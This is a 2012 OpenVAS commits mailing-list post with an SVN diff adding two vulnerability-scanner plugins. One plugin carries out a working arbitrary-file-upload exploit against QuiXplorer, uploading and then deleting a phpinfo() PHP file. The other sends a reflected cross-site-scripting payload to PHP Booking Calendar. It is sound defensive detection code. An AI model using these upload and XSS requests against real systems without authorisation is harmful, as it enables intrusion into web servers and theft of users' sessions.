[Openvas-commits] r12412 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Jan 5 14:42:48 CET 2012


Author: mime
Date: 2012-01-05 14:42:15 +0100 (Thu, 05 Jan 2012)
New Revision: 12412

Added:
   trunk/openvas-plugins/scripts/gb_QuiXplorer_50673.nasl
   trunk/openvas-plugins/scripts/gb_php_booking_calendar_51119.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2012-01-05 13:38:15 UTC (rev 12411)
+++ trunk/openvas-plugins/ChangeLog	2012-01-05 13:42:15 UTC (rev 12412)
@@ -1,3 +1,9 @@
+2012-01-05  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_QuiXplorer_50673.nasl,
+	scripts/gb_php_booking_calendar_51119.nasl:
+	Added new plugins.
+
 2012-01-05  Henri Doreau <henri.doreau at greenbone.net>
 
 	* scripts/secpod_splunk_multiple_vuln.nasl: Updated CVSS from SCAP data.

Added: trunk/openvas-plugins/scripts/gb_QuiXplorer_50673.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_QuiXplorer_50673.nasl	2012-01-05 13:38:15 UTC (rev 12411)
+++ trunk/openvas-plugins/scripts/gb_QuiXplorer_50673.nasl	2012-01-05 13:42:15 UTC (rev 12412)
@@ -0,0 +1,224 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# QuiXplorer 'index.php' Arbitrary File Upload Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; either version 2
+# of the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103377);
+ script_bugtraq_id(50673);
+ script_cve_id("CVE-2011-5005");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_version ("$Revision$");
+
+ script_name("QuiXplorer 'index.php' Arbitrary File Upload Vulnerability");
+
+desc = "Overview:
+QuiXplorer is prone to an arbitrary-file-upload vulnerability because
+the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it
+in the context of the webserver process.
+
+QuiXplorer 2.3 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/50673
+http://quixplorer.sourceforge.net/";
+
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-01-05 11:51:25 +0100 (Thu, 05 Jan 2012)");
+ script_description(desc);
+ script_summary("Determine if QuiXplorer is prone to an arbitrary-file-upload vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
+ script_dependencies("gb_quixplorer_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port, app:"QuiXplorer")){
+  exit(0);
+}
+
+url = string(dir,"/index.php?action=upload&order=type&srt=yes"); 
+host = get_host_name();
+filename = "openvas-" + rand() + ".php";
+len = 1982 + strlen(filename);
+
+req = string("POST ",url," HTTP/1.1\r\n",
+             "Host: ",host,"\r\n",
+             "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:9.0) Gecko/20100101 OpenVAS/4.0\r\n",
+             "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
+             "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n",
+             "Accept-Encoding: gzip, deflate\r\n",
+             "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n",
+             "DNT: 1\r\n",
+             "Connection: keep-alive\r\n",
+             "Referer: http://",host,url,"\r\n",
+             "Content-Type: multipart/form-data; boundary=---------------------------5307133891507148240988240459\r\n",
+             "Content-Length: ",len,"\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="MAX_FILE_SIZE"',"\r\n",
+             "\r\n",
+             "2097152\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="confirm"',"\r\n",
+             "\r\n",
+             "true\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename="',filename,'"',"\r\n",
+             "Content-Type: application/x-php\r\n",
+             "\r\n",
+             '<?php phpinfo(); ?>',"\r\n",
+             "\r\n", 
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n", 
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n", 
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n", 
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n", 
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459\r\n",
+             'Content-Disposition: form-data; name="userfile[]"; filename=""',"\r\n",
+             "Content-Type: application/octet-stream\r\n",
+             "\r\n",
+             "\r\n",
+             "-----------------------------5307133891507148240988240459--\r\n");
+
+
+result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+
+if(result =~ "HTTP/1.. 302" && "Location:" >< result) {
+
+  lines = split(result);
+  foreach line (lines) {
+
+    if(egrep(pattern:"Location:",string:line)) {
+
+      location = eregmatch(pattern:"Location: (.*)$",string:line);
+      break;
+
+    }
+
+  }
+
+  if(isnull(location[1]))exit(0);
+  
+  url = chomp(location[1]);
+  req1 = http_get(item:url, port:port);
+  buf = http_keepalive_send_recv(port:port, data:req1, bodyonly:FALSE);
+
+  if(filename >!< buf)exit(0);
+
+  lines = split(buf);
+  foreach line (lines) {
+
+    if(filename >< line && "<A HREF=" >< line) {
+
+      url = eregmatch(pattern:'<A HREF="([^"]+)"',string:line);
+      break;
+    }
+
+  }
+  
+  if(isnull(url[1]))exit(0);
+
+  req2 = http_get(item:url[1], port:port);
+  buf2 = http_keepalive_send_recv(port:port, data:req2, bodyonly:FALSE);
+
+  if("<title>phpinfo()" >< buf2) {
+
+    # delete uploaded file
+    del = "do_action=delete&first=y&selitems%5B%5D=" + filename;
+    req = string("POST ",dir,"/index.php?action=post&order=type&srt=yes HTTP/1.1\r\n",
+                 "Host: ",host,"\r\n",
+                 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:9.0) Gecko/20100101 OpenVAS/4.0\r\n",
+                 "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
+                 "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n",
+                 "Accept-Encoding: gzip, deflate\r\n",
+                 "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n",
+                 "DNT: 1\r\n",
+                 "Connection: keep-alive\r\n",
+                 "Referer: http://",host,url,"\r\n",
+                 "Content-Type: application/x-www-form-urlencoded\r\n",
+                 "Content-Length: ",strlen(del),"\r\n",
+                 "\r\n",
+                 del);  
+
+    result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+
+    security_hole(port:port);
+    exit(0);
+  }
+
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/gb_QuiXplorer_50673.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date

Added: trunk/openvas-plugins/scripts/gb_php_booking_calendar_51119.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_php_booking_calendar_51119.nasl	2012-01-05 13:38:15 UTC (rev 12411)
+++ trunk/openvas-plugins/scripts/gb_php_booking_calendar_51119.nasl	2012-01-05 13:42:15 UTC (rev 12412)
@@ -0,0 +1,95 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PHP Booking Calendar 'page_info_message' Parameter Cross Site Scripting Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; either version 2
+# of the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103376);
+ script_bugtraq_id(51119);
+ script_cve_id("CVE-2011-5045");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_version ("$Revision$");
+
+ script_name("PHP Booking Calendar 'page_info_message' Parameter Cross Site Scripting Vulnerability");
+
+desc = "Overview:
+PHP Booking Calendar is prone to a cross-site scripting vulnerability
+because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected
+site. This may allow the attacker to steal cookie-based authentication
+credentials and launch other attacks.
+
+PHP Booking Calendar 10e is vulnerable; other versions may also
+be affected.
+
+References:
+http://www.securityfocus.com/bid/51119
+http://sourceforge.net/projects/bookingcalendar/
+http://www.securityfocus.com/archive/1/520929";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-01-04 15:47:28 +0100 (Wed, 04 Jan 2012)");
+ script_description(desc);
+ script_summary("Determine if PHP Booking Calendar is prone to a cross-site scripting vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2012 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/booking_calendar/","/cal",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=<script>alert(/openvas-xss-test/)</script>"); 
+
+  if(http_vuln_check(port:port, url:url,pattern:"<script>alert\(/openvas-xss-test/\)</script>",check_header:TRUE, extra_check:"Booking Calendar")) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_php_booking_calendar_51119.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date



More information about the Openvas-commits mailing list